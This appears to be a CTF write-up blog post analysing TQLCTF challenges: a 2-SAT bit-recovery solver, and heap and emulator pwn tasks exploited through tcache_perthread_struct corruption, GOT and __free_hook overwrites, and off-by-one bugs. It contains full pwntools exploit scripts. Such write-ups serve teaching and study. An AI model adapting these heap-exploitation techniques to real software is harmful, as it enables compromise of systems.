[Original] TQLCTF RE/PWN: Detailed Analysis and Write-ups for Selected Challenges

Tokameine

Posted: 2022-3-1 12:29 12661

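This post is my own post-contest reproduction and analysis of some of the challenges. It may quote publicly released exploits, but the focus is on the analysis process rather than the final result. Corrections are very welcome; if anything here infringes, I apologize and will remove it on request.

Before this challenge I had never even encountered the 2-SAT problem, so I will start with a short overview.

The following is quoted from OI Wiki:

2-SAT, put simply: there are n sets, each containing two elements, together with a number of pairs <a,b> stating that a and b conflict (where a and b belong to different sets). One element is then chosen from each set, and the question is whether n pairwise non-conflicting elements can be chosen.

The key points of this challenge are:

Each round prints the states of three randomly chosen bits of the bitstream as signed literals, but a printed state may be negated. Whether it is negated is random (the generator listing tests `random.randint(0,3)==0`, so a non-guaranteed literal is printed truthfully one time in four and negated otherwise, rather than with probability 0.5).

At first this is a 3-SAT problem: in each round one literal is guaranteed to be true, while the other two may be true or false. But 3-SAT is NP-complete and essentially intractable in general, so the first step is to use special properties of the plaintext to remove uncertainty.

Because the string must be printable, it consists of ASCII characters, whose most significant bit is always 0. The literal for such a bit is therefore always negative. If a group prints it as positive, that literal is false, so at least one of the other two literals in the group must be true. Extracting all groups of this kind reduces the problem to 2-SAT: one of the two is guaranteed true and the other may be true or false.

2-SAT can be solved in polynomial time (a known result that I have not proved myself). Separately, with enough data the instance is expected to have a unique solution; this challenge provides 5000 groups, which is enough.

The rest of the solution is straightforward. Within a two-choice group, if another "always negative" bit is printed as positive, the remaining literal must be true. Collecting every literal whose truth value is determined this way recovers the whole bitstream.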
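The elimination described above amounts to unit propagation. Below is a minimal sketch of that idea, not the script used in this post: the function names are made up for illustration, and it repeats the pass until nothing changes, whereas the solver listing makes a single pass. Literals follow the challenge's encoding (bit i, 0-based, is literal i+1, negative when the bit is 0).

```python
def msb_literals(n_bits):
    """Literals known to be true up front: the top bit of every byte is 0."""
    return {-(8 * k + 1) for k in range(n_bits // 8)}


def propagate(clauses, known):
    """Repeat unit propagation until no new literal can be fixed."""
    known = set(known)
    changed = True
    while changed:
        changed = False
        for clause in clauses:
            if any(lit in known for lit in clause):
                continue  # already satisfied, so it forces nothing
            # Literals whose negation is known are false; keep the rest.
            open_lits = {lit for lit in clause if -lit not in known}
            if len(open_lits) == 1:
                known.add(open_lits.pop())
                changed = True
    return known


def bits_from(known, n_bits):
    """Render the recovered assignment, with '?' for undetermined bits."""
    return "".join(
        "1" if i in known else "0" if -i in known else "?"
        for i in range(1, n_bits + 1)
    )
```

For example, `propagate([[1, 2, 1], [-2, 1, 8], [1, -2, -3]], msb_literals(8))` fixes literals 2, 8 and -3 starting from the single known literal -1.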

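My script, adapted from the write-up published by Nu1L:

Arbitrary-address free, no leak, no PIE. It should have been an easy challenge, yet it took me a whole day... After reading the official write-up I realized I had not thought far enough. My own approach does work, though, so I will start with it.

The libc version is 2.31, so tcache is present. I had rarely touched this area before, so I am recording it in more detail this time (personally I do not like learning exploitation techniques before I need them; it feels like exploiting for the sake of exploiting).

I will not restate the program logic. The one thing worth noting is that it frees the chunk allocated in the current round almost immediately, so it is hard to arrange chunks in the bins.

The arbitrary-address free lets us free tcache_perthread_struct directly. Its structure is as follows:

So the structure occupies a chunk of size 0x290, and it controls all tcache bin state, including the list heads and the counts.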
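The 0x290 figure can be checked with a little arithmetic. The sketch below assumes a 64-bit target (8-byte size field, 16-byte alignment); the helper names are illustrative and are not glibc identifiers.

```python
TCACHE_MAX_BINS = 64   # from the struct listing
SIZE_SZ = 8            # assumption: 64-bit target
MALLOC_ALIGN = 16      # assumption: x86-64 chunk alignment


def chunk_size(request):
    """Round a request up to a chunk size (size field plus alignment)."""
    size = (request + SIZE_SZ + MALLOC_ALIGN - 1) & ~(MALLOC_ALIGN - 1)
    return max(size, 0x20)


def tcache_struct_chunk_size():
    counts = 2 * TCACHE_MAX_BINS    # uint16_t counts[64]
    entries = 8 * TCACHE_MAX_BINS   # tcache_entry *entries[64]
    return chunk_size(counts + entries)


def tcache_index(csize):
    """Bin index for a chunk size: 0x20 -> 0, 0x30 -> 1, ..."""
    return (csize - 0x20) // 0x10


def counts_offset(csize):
    """Byte offset of counts[idx] inside the struct."""
    return 2 * tcache_index(csize)


def entries_offset(csize):
    """Byte offset of entries[idx] inside the struct."""
    return 2 * TCACHE_MAX_BINS + 8 * tcache_index(csize)
```

With these helpers, `tcache_struct_chunk_size()` gives 0x290, and the list heads for the 0x20 and 0x30 bins sit at offsets 0x80 and 0x88, which is where the payload in this post places its two pointers.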

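So we first free it and then fill it with data:

After the data is written, the program immediately frees tcache_perthread_struct again, but this time the tcache bin is already full, so the chunk goes into the unsorted bin. The bins look like this: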
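To make the layout of that data concrete, here is a small sketch that builds the same bytes with only the standard library. `fake_tcache` is a hypothetical helper; the two addresses are the ones shown in the bin dump (free@got.plt and target).

```python
import struct


def fake_tcache(full_bins, heads):
    """Build a fake tcache_perthread_struct body.

    full_bins: how many leading bins get count 7 (reported as full).
    heads:     {bin index: address} for the list heads to plant.
    """
    counts = b"".join(
        struct.pack("<H", 7 if i < full_bins else 0) for i in range(64)
    )
    entries = b"".join(struct.pack("<Q", heads.get(i, 0)) for i in range(64))
    return counts + entries


FREE_GOT = 0x404018   # free@got.plt, as shown in the bin dump
TARGET = 0x404080     # target, as shown in the bin dump

# 0x28 full bins covers indexes 0..39, i.e. sizes 0x20 through 0x290.
payload = fake_tcache(0x28, {0: FREE_GOT, 1: TARGET})
```

The first 160 bytes of `payload` match the pwntools expression used in the exploit; the rest is zero padding up to the full 0x280-byte structure.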

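First we allocate a chunk of size 0x50 to split the block in the unsorted bin, so that the bin no longer holds the head of tcache_perthread_struct (the reason is explained below).

If we do not split the unsorted bin beforehand, the checks in libc 2.31 raise the following error:

malloc(): unsorted double linked list corrupted

The unsorted bin previously held tcache_perthread_struct itself, whose counts overlap the fd pointer of the freed chunk. Taking a chunk out of tcache decrements a count, so fd no longer points anywhere valid, the circular list is broken, and the check fails (earlier versions were not this strict; 2.31 is noticeably harsher).

However, this error is raised inside puts: that function allocates heap space for its output, so the corruption is only detected when that allocation tries to use the unsorted bin. Allocations served from the tcache bins are not affected.

Another point to note: free_got cannot be overwritten directly with the address inside function c3 that skips the check; that also ends in a crash inside puts. I currently do not know why writing main works while writing the c3 address crashes. If anyone knows, please do tell me.

My complete exploit:

Now back to the official write-up. The challenge author says that being able to write the GOT was purely an accident; the intended solution goes through IO, roughly as follows:

The official exploit (comments added by me):

Some additional notes. I knew about vtable dispatch before but had never looked into it closely; since it came up here, a brief summary follows.
When puts is called, it reaches _IO_file_xsputn through the vtable; that function is the real implementation of puts. The call chain is:

puts-->_IO_file_xsputn-->_IO_file_overflow-->_IO_doallocbuf-->_IO_file_doallocate

_IO_file_doallocate is where malloc is actually called to allocate the buffer. The calling source:

_IO_doallocbuf calls _IO_file_doallocate through the jump table to allocate the space.

That concludes this challenge.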

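An emulator. In my view the difficulty lies in grasping the logic of the whole program: it is fairly large, and just finding the vulnerability takes a while.

The help command lists all available commands.

Reading the source shows that the initialization stage calls load_img to load the image. The image used by nemu is:

Only part of the implementation is provided as source; exec_real, for instance, is not, so it has to be reverse engineered. Its rough process is:

The opcode_entry structure is:

decode and execute are both function pointers, pointing to the instruction-decoding function and the instruction-executing function.

For example, exec_mov (this challenge seems to implement only the mov instruction; the execute functions of the other instructions are invalid):

decoding is a global variable. An instruction is first decoded into decoding, and exec_mov then uses that structure, which is defined as:

Reading through the source makes it clear that nemu simulates the instruction execution flow, but no instruction is really executed, and it implements so few instructions that exploiting it by loading bytecode is not feasible. Another route is needed.

Note, however, that the so-called image is an array, defined as:

Since it is declared as a global, it is not allocated on the stack; and because it is very large and needs no non-zero initial value, it is placed in the .bss section, which takes no space in the file. Accessing the image is therefore accessing .bss. nemu provides the x command to read the contents of an address; its key implementation is:

It does not bound the address at all, so memory beyond the image can be accessed, giving an arbitrary read (more precisely, an arbitrary read at addresses above pmem).

Likewise, vaddr_write, the core of the set command, is:

0x6A3B80LL is pmem. Again there is no bound on the address, which gives an arbitrary write (strictly speaking "arbitrary" is inaccurate: only addresses above pmem can be written, not lower ones).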
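The reachable window can be expressed as a small helper. This is only a sketch: `pmem_offset` and `reachable` are hypothetical names, and the 32-bit limit assumes that vaddr_t is a 32-bit unsigned value, which is how the post describes the restriction.

```python
PMEM_BASE = 0x6A3B80      # pmem, taken from the decompiled vaddr_write
VADDR_MAX = 0xFFFFFFFF    # assumption: vaddr_t is 32-bit unsigned


def pmem_offset(target):
    """Return the addr argument that makes x/set touch `target`."""
    off = target - PMEM_BASE
    if off < 0:
        raise ValueError("target lies below pmem")
    if off > VADDR_MAX:
        raise ValueError("target is more than 4 GiB above pmem")
    return off


def reachable(target):
    """True when `target` is inside the window above pmem."""
    try:
        pmem_offset(target)
    except ValueError:
        return False
    return True
```

Under these assumptions the opcode_table at 0x60F240 (below pmem) is not reachable, and neither is a typical 0x7f... library address, which is why the leak has to start from data stored near pmem.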

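Now that we can read and write almost arbitrarily, the goal is clear: leak libc_base, then overwrite some function with a one_gadget.

That looks sufficient, but without having read the write-up it would not go so smoothly, so let us analyze the other commands as well.

The core of the w command is set_watchpoint (simplified):

nemu manages watchpoint memory with a pool, built during initialization by init_wp_pool:

head, free_ and wp_pool are all pointers to the watchpoint structure, which is defined as:

wp_pool is also an array, but there is nothing deep here; the logic is plain:

The memory pool is wp_pool; initialization links the entire pool into free_.

Allocating a wp takes a structure from free_; releasing one puts it back on the free_ list (both via the next pointer).

head points to the wp structures in use.
set_watchpoint links the allocated structure into head, and all wps are traversed through head.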
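The pool logic above can be modelled in a few lines. This is a toy model for illustration only: `new_wp` mirrors the simplified set_watchpoint listing, while `free_wp` is an assumption about delete_watchpoint, whose source is not shown in this post.

```python
class WP:
    def __init__(self, no):
        self.NO = no
        self.next = None
        self.exp = ""
        self.old_val = 0


class WatchpointPool:
    def __init__(self, size=32):
        self.pool = [WP(i) for i in range(size)]
        # init_wp_pool: chain every entry, the last one ends the list.
        for cur, nxt in zip(self.pool, self.pool[1:]):
            cur.next = nxt
        self.head = None
        self.free_ = self.pool[0]

    def new_wp(self, exp, value):
        wp = self.free_               # take the first free entry
        if wp is None:
            raise RuntimeError("pool exhausted")
        self.free_ = wp.next
        wp.next = None
        wp.exp, wp.old_val = exp, value
        if self.head is None:
            wp.NO = 1
            self.head = wp
        else:
            tail = self.head
            while tail.next is not None:
                tail = tail.next
            wp.NO = tail.NO + 1
            tail.next = wp            # append to the in-use list
        return wp

    def free_wp(self, no):
        # Assumed behaviour: unlink from head, push back onto free_.
        prev, cur = None, self.head
        while cur is not None and cur.NO != no:
            prev, cur = cur, cur.next
        if cur is None:
            return False
        if prev is None:
            self.head = cur.next
        else:
            prev.next = cur.next
        cur.next = self.free_
        self.free_ = cur
        return True
```

The point to take from the model is that `new_wp` trusts `free_` completely: whatever it points at is treated as a watchpoint structure and written to.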

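There is something exploitable here too. The key point:

If we can change free_ to some address, the w command will write data to that address.

But is this not redundant? We already have an arbitrary write, so what is the point?

Although we can already write arbitrarily, vaddr_write writes 4 bytes, whereas set_watchpoint can write 0x28 bytes at once. In addition, the write address has to be passed to vaddr_write as an argument that first goes through expr, and in my tests some larger address arguments were skipped and could not be written. Since the main job of expr is simply to parse arguments, it does not seem worth analyzing its workings in detail, so my analysis of the w command stops here.

The core of the d command is delete_watchpoint, the inverse of w, so I will not go into it. Commands such as p and q are unfinished and not implemented.

We have now analyzed every command we will touch and have a plan; next comes the exploitation.

First we need to leak libc_base. Reads are restricted, however: we can only read above pmem, and not too far above, at most within the range representable in four bytes. So we should look in .bss for data that yields a chunk address. After some debugging, re was chosen as the target:

After initialization this array is filled with a series of buffers, roughly structured as:

The buffers are allocated on the heap, so reading any one of them gives us the heap base: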
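Since vaddr_read returns a 32-bit value, a 64-bit heap pointer has to be assembled from two reads. A minimal sketch follows; `read32` stands for whatever routine sends an x command and parses the reply (that routine is hypothetical and not shown here), and the offset of the buffer inside the heap has to be found by debugging.

```python
import struct


def read_qword(read32, offset):
    """Combine two 32-bit reads into one little-endian 64-bit value."""
    lo = read32(offset) & 0xFFFFFFFF
    hi = read32(offset + 4) & 0xFFFFFFFF
    return (hi << 32) | lo


def heap_base_from(pointer, offset_in_heap):
    """Subtract the (debugger-determined) offset of the leaked buffer."""
    return pointer - offset_in_heap
```

For a quick local check, `read32` can be backed by a bytes object, for example `lambda off: struct.unpack_from("<I", blob, off)[0]`.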

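Then, by debugging, find a chunk whose fd or bk has not been cleared in the current state (I tried looking in the bins, but that did not work well, so I simply picked one using gdb's heap command):

Next we need to write the GOT. But the GOT lies below pmem, so the normal write cannot reach it, and the w command has to be used as an alternative way of writing:

The key assembly of the w command is:

eax holds the low 4 bytes of our argument, and rcx is free_. The function loads free_ and stores eax at [rcx+30h], which is how we overwrite the GOT entry.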
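The value to plant in free_ follows directly from that store. The sketch below uses offsets read off the listings in this post (init_wp_pool writes NO at +0 and next at +8 with a stride of 56 bytes; the store described above lands at +0x30); the GOT slot address in the example is made up.

```python
OFF_NO = 0x00        # written as v2->NO
OFF_NEXT = 0x08      # written as v2->next = 0
OFF_OLD_VAL = 0x30   # the [rcx+30h] store
WP_SIZE = 56         # stride used by init_wp_pool


def free_for_target(target_addr):
    """Value to plant in free_ so that old_val lands on target_addr."""
    return target_addr - OFF_OLD_VAL


def touched_range(free_value):
    """Address range of the fake watchpoint structure, [start, end)."""
    return free_value, free_value + WP_SIZE


HYPOTHETICAL_GOT_SLOT = 0x60F030   # placeholder, not taken from the binary
fake_free = free_for_target(HYPOTHETICAL_GOT_SLOT)
```

Note that set_watchpoint also writes NO, next and the expression text into the same structure, so everything inside `touched_range(fake_free)` should be regarded as clobbered, not only the 4 bytes at the target.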

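Finally, all that remains is to trigger a call to the printf_chk function.

My complete exploit:

This was my first time working with Unicorn. I had met similar challenges before, but my skills then were too limited to even follow the write-ups well, so this counts as my first proper encounter with this kind of emulator.

Unicorn is a mature open-source CPU emulator, and this challenge builds a simple virtual machine on top of it. The main logic of its main function, simplified, is as follows (simplified for readability, so the code is not guaranteed to run):

In short:

It initializes an emulator, maps the user-supplied machine code at address 0x400000 inside the emulator, and registers a syscall hook, so that when a syscall instruction executes inside the emulator, the implementation in the hook is called. Finally it reads the emulator's ecx and edx registers and shows them to the user.

The simplified logic of handle_syscall:

The file structure:

The challenge also enables a sandbox; the code is:

I will not go through the sandbox rules in detail; in short, only the three calls open, read and write (orw) are allowed.

Here I only excerpt the core implementation, fd_malloc:

Note the strcpy call on line 22: it copies a1 byte by byte into v6->name. Given the file structure, if the string a1 is long enough it should overflow from name into malloc_buf, because strcpy keeps copying until it meets a '\x00' in src.

In system_open, a1 comes from:

Here a1 is the emulator itself. uc_reg_read reads the edi and esi registers into v3 and size respectively; v3 is a pointer to a string, and uc_mem_read then reads the string at that pointer into the name array.

Note, however, that uc_mem_read reads at most 24 characters, so name holds at most 24 characters.

The name field in the file structure is also 24 characters, and strcpy terminates the destination string with a '\x00'. So if name is filled with all 24 bytes, one '\x00' overflows into malloc_buf, which is an off-by-one vulnerability.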
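The effect of that single byte is easy to see in a small simulation. The record below contains only the two fields mentioned in the text, a 24-byte name immediately followed by the malloc_buf pointer; the real structure has more fields, and the pointer value is made up.

```python
import struct

NAME_LEN = 24


def make_record(malloc_buf):
    """name[24] followed directly by the 8-byte malloc_buf pointer."""
    return bytearray(b"\x00" * NAME_LEN + struct.pack("<Q", malloc_buf))


def c_strcpy(dest, src):
    """Mimic strcpy: copy up to the first NUL, then append one NUL."""
    end = src.find(b"\x00")
    if end == -1:
        end = len(src)
    data = src[:end] + b"\x00"
    dest[0:len(data)] = data


def malloc_buf_of(record):
    return struct.unpack_from("<Q", record, NAME_LEN)[0]


rec = make_record(0x5555555592C0)   # hypothetical heap pointer
c_strcpy(rec, b"A" * NAME_LEN)      # 24 bytes of name + 1 NUL terminator
```

After the copy, `malloc_buf_of(rec)` is 0x555555559200: the low byte of the pointer has been zeroed, so it now points to a lower address in the same 0x100-byte region.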

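Again, only the key parts:

write_func is the function pointer stored earlier in the file structure; its implementation is:

It first finds the corresponding file through fileno, then uses memcpy to copy the contents of buf into fd->malloc_buf.

It copies the data in fd->malloc_buf into buf with memcpy.

It frees fd->malloc_buf and sets it to zero, clears the other fields, and decrements the global fd counter.

Note, however, that stdin, stdout and stderr have their own separate handlers:

If the inode number is one of these three, malloc_xxx is not called.

These are the only key functions in the program, and so far we have found just one vulnerability, in open.

Since we can overflow into fd->malloc_buf, we can get the altered address freed and thereby create a UAF.

First we need to leak the libc base. The user cannot interact with the virtual machine directly, and the program emulated in unicorn has an address space completely different from ours, so obtaining the data directly through bytecode does not work: in theory our data and its data are isolated.

But one place is not isolated: fd->malloc_buf. This buffer is allocated from user space (the heap of the host process), so it can contain user-space data.

The exploitation below mainly follows the exploit published by team Nu1L.

Let us first feed in some arbitrary executable machine code and look at the heap state at that point:

Note that unsortedbin and largebins are non-empty at this point, and allocation uses malloc, which does not clear memory. So we only need system_open to allocate fd->malloc_buf from the unsortedbin or largebins and then write it out with write to leak a libc address.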
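Turning the leaked bytes into a base address is a subtraction plus a sanity check. In the sketch below the helper name is made up, and the offset 0x1ebbe0 (main_arena+96) is an assumption that happens to fit the pointers in the bin dump of the earlier glibc 2.31 challenge; for this challenge it must be taken from the libc actually provided.

```python
import struct


def libc_base_from_leak(leaked, symbol_offset):
    """Convert leaked little-endian pointer bytes into a libc base."""
    ptr = struct.unpack("<Q", leaked[:8].ljust(8, b"\x00"))[0]
    base = ptr - symbol_offset
    if base & 0xFFF:
        # A real base is page aligned; anything else means a wrong
        # offset or a pointer that is not what we think it is.
        raise ValueError("base is not page aligned")
    return base


# Example using the main_arena+96 pointer from the earlier bin dump.
leak = struct.pack("<Q", 0x7F1F0407FBE0)
base = libc_base_from_leak(leak, 0x1EBBE0)
```

The alignment check is cheap and catches most mistakes early, before any address derived from the base is used.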

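Although an address is now leaked, exploitation is somewhat awkward. Unicorn is used as an external library, and we do not know how many malloc and free calls it makes during execution (unless we actually read its source, which does not seem practical), so arranging the heap is troublesome. Still, a few tricks help.

From the earlier heap state, a few bins appear not to be used by the library, for example size=0x60/0x80/0xc0; chunks of these sizes do not appear in the tcache bins. So, conservatively, we can find a chunk size controlled entirely by us and need not worry about interference from library calls.

When leaking the address above:

the call on this line requests a chunk of size 0xc0, which is very likely to be unaffected.

The plan from here:

First close inode 3, releasing the 0xc0 chunk into the tcache bin. Then use the off-by-one to move a malloc_buf pointer to just above that chunk, and write through it to overwrite the chunk's fd pointer below, so that a later allocation returns the address stored in fd.

We can make that address __free_hook, which can then be set to a one_gadget or various other things (but this challenge enables a sandbox, so one_gadget will not do; we still have to do orw properly to read the flag).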
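The fd overwrite described above is ordinary tcache poisoning. The toy model below only illustrates the list mechanics; it assumes a glibc without pointer mangling on tcache links and with a per-bin count check, and every address in it is a placeholder.

```python
class ToyTcacheBin:
    """Singly linked LIFO list, modelled after one tcache bin."""

    def __init__(self):
        self.head = 0
        self.count = 0

    def free(self, mem, addr):
        mem[addr] = self.head     # chunk's next/fd = old head
        self.head = addr
        self.count += 1

    def malloc(self, mem):
        if self.count == 0:       # assumed count check
            return None
        addr = self.head
        self.head = mem.get(addr, 0)
        self.count -= 1
        return addr


FREE_HOOK = 0x7F0000001E48        # placeholder for &__free_hook

mem = {}                          # address -> stored next pointer
bin_c0 = ToyTcacheBin()
bin_c0.free(mem, 0x1000)
bin_c0.free(mem, 0x2000)          # two frees keep count high enough
mem[0x2000] = FREE_HOOK           # the overflow rewrites the head's fd
first = bin_c0.malloc(mem)        # returns the legitimate chunk
second = bin_c0.malloc(mem)       # returns the planted address
```

In this model the second allocation hands back the planted address, which is the effect the plan above relies on.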

The rest of the payload is self-explanatory, so here is the Nu1L exploit directly (with a few comments of my own):

import random

# bits, n (number of bits) and N (number of groups) are defined elsewhere in the challenge script
def get_lit(i):
    return (i+1) * (2*int(bits[i])-1)

for t in range(N):
    i = random.randint(0,n-1)
    p = random.randint(0,2)
    true_lit = get_lit(i)
    for j in range(3):
        if j == p:
            print(true_lit)
        else:
            tmp = random.randint(0,n-1)
            rand_true = get_lit(tmp)
            if random.randint(0,3)==0:
                print(rand_true)
            else:
                print(-rand_true)

f = open("output.txt")
n = int(f.readline().rstrip('\n'))   # number of bits
N = int(f.readline().rstrip('\n'))   # number of groups

x=[]
for i in range(N):
    x1=int(f.readline())
    x2=int(f.readline())
    x3=int(f.readline())
    x.append([x1,x2,x3])

# literals known to be true; the top bit of every byte is 0
true_numer=[]
for i in range(n//8):
    true_numer.append(-8*i-1)

flag=[]
for i in range(n):
    flag.append(0)

count=0   # number of groups that determined a literal
for i in x:
    # two literals are known to be false, so the third must be true
    if(((-i[0] in true_numer) + (-i[1] in true_numer) + (-i[2] in true_numer))==2):
        count+=1
        for j in range(3):
            if((i[j] not in true_numer)and(-i[j]not in true_numer)):
                true_numer+= [i[j]]

for i in true_numer:
    if(i<0):
        flag[abs(i)-1]=0
    else:
        flag[i-1]=1

flag_text=""
for i in flag:
    flag_text+=str(i)

print(bytes.fromhex(hex(int(flag_text,2))[2:]))

f.close()

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];//TCACHE_MAX_BINS=64
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

typedef struct tcache_entry
{
  struct tcache_entry *next;
  struct tcache_perthread_struct *key;
} tcache_entry;

# First allocate a chunk so that it ends up in the tcache bin, for later use
payload1='aaaaaaaa'
create_chunk(0x28,payload1)
# Then free tcache_perthread_struct
free_index(-0x290)
# Next set the tcache counts to 7, meaning full, so later chunks no longer go there
# At the same time point a few next pointers at free_got and target_addr
# so that we can later write data to free_got and target
payload1=(p16(7)*0x28).ljust(128,b'\x00')+(p64(free_got)+p64(target_addr)+p64(0)+p64(0))
create_chunk(0x288,payload1)

tcachebins
0x20 [64480]: 0x404018 (free@got.plt) —▸ 0x7f1f03f31850 (free) ◂— endbr64
0x30 [1031]: 0x404080 (target) ◂— 0xfedcba9876543210
.......
0x280 [  7]: 0x0
0x290 [  7]: 0x0
unsortedbin
all: 0x1866000 —▸ 0x7f1f0407fbe0 (main_arena+96) ◂— 0x1866000

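# payload1 is unchanged here; the content does not matter, the only purpose is to split the chunk
create_chunk(0x48,payload1)
# Then overwrite free_got with main; 0x401040 is the default value of the next entry
# Taking a chunk from a tcache bin writes 0 into its key field, which would zero the entry of the function after free
# so restore that entry to its not-yet-resolved state to avoid a crash when it is called
payload1=p64(main_addr)+p64(0x401040)
create_chunk(0x18,payload1)
# Then take target as well and write anything into it, as long as it differs from the original value
create_chunk(0x28,payload1)
# Finally call the c3 function
open_flag()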

from pwn import *

context.log_level = 'debug'
p = process('./pwn')
elf=ELF('./pwn')

malloc=0x401387
free=0x4013fd
ret=0x40154D

free_got=elf.got['free']
target_addr=0x404080
ptr_addr=free_got
main=0x40152D
mas=0x401473
mas=main

def create_chunk(size,context):
    p.sendline(str(1))
    p.sendline(str(size))
    p.sendline(context)

def free_index(index):
    p.sendline(str(2))
    p.sendline(str(index))

def open_flag():
    p.sendline(str(3))

payload1='aaaaaaaa'
create_chunk(0x28,payload1)

free_index(-0x290)
payload1=(p16(7)*0x28).ljust(128,b'\x00')+(p64(ptr_addr)+p64(target_addr)+p64(0)+p64(0))

create_chunk(0x288,payload1)

create_chunk(0x48,payload1)
payload1=p64(mas)+p64(0x401040)

create_chunk(0x18,payload1)
create_chunk(0x28,payload1)

open_flag()
p.interactive()

static struct malloc_par mp_ =
{
  .top_pad = DEFAULT_TOP_PAD,
  .n_mmaps_max = DEFAULT_MMAP_MAX,
  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
  .arena_test = NARENAS_FROM_NCORES (1)
#if USE_TCACHE
  ,
  .tcache_count = TCACHE_FILL_COUNT,
  .tcache_bins = TCACHE_MAX_BINS,
  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
  .tcache_unsorted_limit = 0 /* No limit.  */
#endif
};

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64')
#context.log_level='debug'

def exp():
    io = process('./pwn', stdout=PIPE)

    def malloc(size, content):
        io.sendlineafter(b'>', b'1')
        io.sendline(str(int(size)).encode())
        io.send(content)

    def tcache_count(l):
        res = [b'\x00\x00' for i in range(64)]
        for t in l:
            res[(t - 0x20)//0x10] = b'\x08\x00'
        return b''.join(res)

    try:
        # Spray 0x404078 into the top chunk; once tcache is enlarged, these all become next pointers
        malloc(0x1000, p64(0x404078)*(0x1000//8))
        # Free tcache_perthread_struct
        io.sendlineafter(b'>', b'2')
        io.sendline(b'-656')
        # First set the 0x290 count to 8 so that tcache_perthread_struct goes into the unsorted bin
        malloc(0x280, tcache_count([0x290]) + b'\n')
        # Then split tcache_perthread_struct so that the 0x400 and 0x410 entries of the tcache bin receive main_arena+96
        malloc(0x260, tcache_count([0x270]) + b'\n')
        # Then mark 0x400 and 0x410 as full too, and change the low bytes of the address in the 0x400 entry to 0xf290
        # This is plain brute force, hoping that it points to &mp_+0x10
        malloc(0x280, tcache_count([0x400, 0x410, 0x290]) + b'\x01\x00'*4*62 + b'\x90\xf2' + b'\n')
        # If it does point to &mp_+0x10, overwrite the data there to enlarge tcache
        malloc(0x3f0, flat([
            0x20000,
            0x8,
            0,
            0x10000,
            0, 0, 0,
            0x1301000,
            2**64-1,
        ]) + b'\n')
        # Call puts so that it allocates a buffer for stdout; the chunk is taken from tcache
        # but tcache has been seeded with 0x404078, so that memory is returned
        # and the string printed by puts is written into that memory
        io.sendlineafter(b'>', b'3')
        # target has now been modified, so calling it directly succeeds
        io.sendlineafter(b'>', b'3')
        flaaag = io.recvall(timeout=2)
        print(flaaag)
        io.close()
        return True
    except:
        io.close()
        return False

i = 0
while i < 20 and not exp():
    i += 1
    continue

_IO_new_file_overflow (FILE *f, int ch)
{
    ......
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_IO_write_base == NULL)
    {
      _IO_doallocbuf (f);
      _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
    }
    ......
}
libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)

(nemu) help
help - Display informations about all supported commands
c - Continue the execution of the program
q - Exit NEMU
si - Execute the step by one
info - Show all the regester' information
x - Show the memory things
p - Show varibeals and numbers
w - Set the watch point
d - Delete the watch point
set - Set memory

static inline int load_default_img() {
  const uint8_t img []  = {
    0xb8, 0x34, 0x12, 0x00, 0x00,        // 100000:  movl  $0x1234,%eax
    0xb9, 0x27, 0x00, 0x10, 0x00,        // 100005:  movl  $0x100027,%ecx
    0x89, 0x01,                          // 10000a:  movl  %eax,(%ecx)
    0x66, 0xc7, 0x41, 0x04, 0x01, 0x00,  // 10000c:  movw  $0x1,0x4(%ecx)
    0xbb, 0x02, 0x00, 0x00, 0x00,        // 100012:  movl  $0x2,%ebx
    0x66, 0xc7, 0x84, 0x99, 0x00, 0xe0,  // 100017:  movw  $0x1,-0x2000(%ecx,%ebx,4)
    0xff, 0xff, 0x01, 0x00,
    0xb8, 0x00, 0x00, 0x00, 0x00,        // 100021:  movl  $0x0,%eax
    0xd6,                                // 100026:  nemu_trap
  };

  Log("No image is given. Use the default build-in image.");
  memcpy(guest_to_host(ENTRY_START), img, sizeof(img));
  return sizeof(img);
}

.data:000000000060F240 opcode_table    opcode_entry 0Fh dup(<0, offset exec_inv, 0>)
.data:000000000060F240                                         ; DATA XREF: exec_2byte_esc+9E↑o
.data:000000000060F240                                         ; exec_2byte_esc+A5↑r ...
.data:000000000060F240                 opcode_entry <0, offset exec_2byte_esc, 0>
.data:000000000060F240                 opcode_entry 56h dup(<0, offset exec_inv, 0>)
.data:000000000060F240                 opcode_entry <0, offset exec_operand_size, 0>
.data:000000000060F240                 opcode_entry 19h dup(<0, offset exec_inv, 0>)
...... (rest omitted)

typedef struct {
  DHelper decode;
  EHelper execute;
  int width;
} opcode_entry;

void __fastcall exec_mov(vaddr_t *eip_0)
{
  __int64 v1; // r9
  __int64 v2; // r9

  operand_write(&decoding.dest, &decoding.src.val);
  v1 = 108LL;
  if ( decoding.dest.width != 4 )
  {
    v1 = 98LL;
    if ( decoding.dest.width != 1 )
    {
      v1 = 63LL;
      if ( decoding.dest.width == 2 )
        v1 = 119LL;
    }
  }
  if ( __snprintf_chk(141182936LL, 80LL, 1LL, 80LL, "mov%c %s,%s", v1, decoding.src.str, decoding.dest.str) > 79 )
  {
    fflush(stdout);
    fwrite("\x1B[1;31m", 1uLL, 7uLL, stderr);
    fwrite("buffer overflow!", 1uLL, 0x10uLL, stderr);
    fwrite("\x1B[0m\n", 1uLL, 5uLL, stderr);
    v2 = 108LL;
    if ( decoding.dest.width != 4 )
    {
      v2 = 98LL;
      if ( decoding.dest.width != 1 )
      {
        v2 = 63LL;
        if ( decoding.dest.width == 2 )
          v2 = 119LL;
      }
    }
    if ( __snprintf_chk(141182936LL, 80LL, 1LL, 80LL, "mov%c %s,%s", v2, decoding.src.str, decoding.dest.str) > 79 )
      __assert_fail(
        "snprintf(decoding.assembly, 80, \"mov\" \"%c %s,%s\", (((&decoding.dest)->width) == 4 ? 'l' : (((&decoding.dest)"
        "->width) == 1 ? 'b' : (((&decoding.dest)->width) == 2 ? 'w' : '?'))), (&decoding.src)->str, (&decoding.dest)->str) < 80",
        "src/cpu/exec/data-mov.c",
        5u,
        "exec_mov");
  }
}

typedef struct {
  uint32_t opcode;
  vaddr_t seq_eip;  // sequential eip
  bool is_operand_size_16;
  uint8_t ext_opcode;
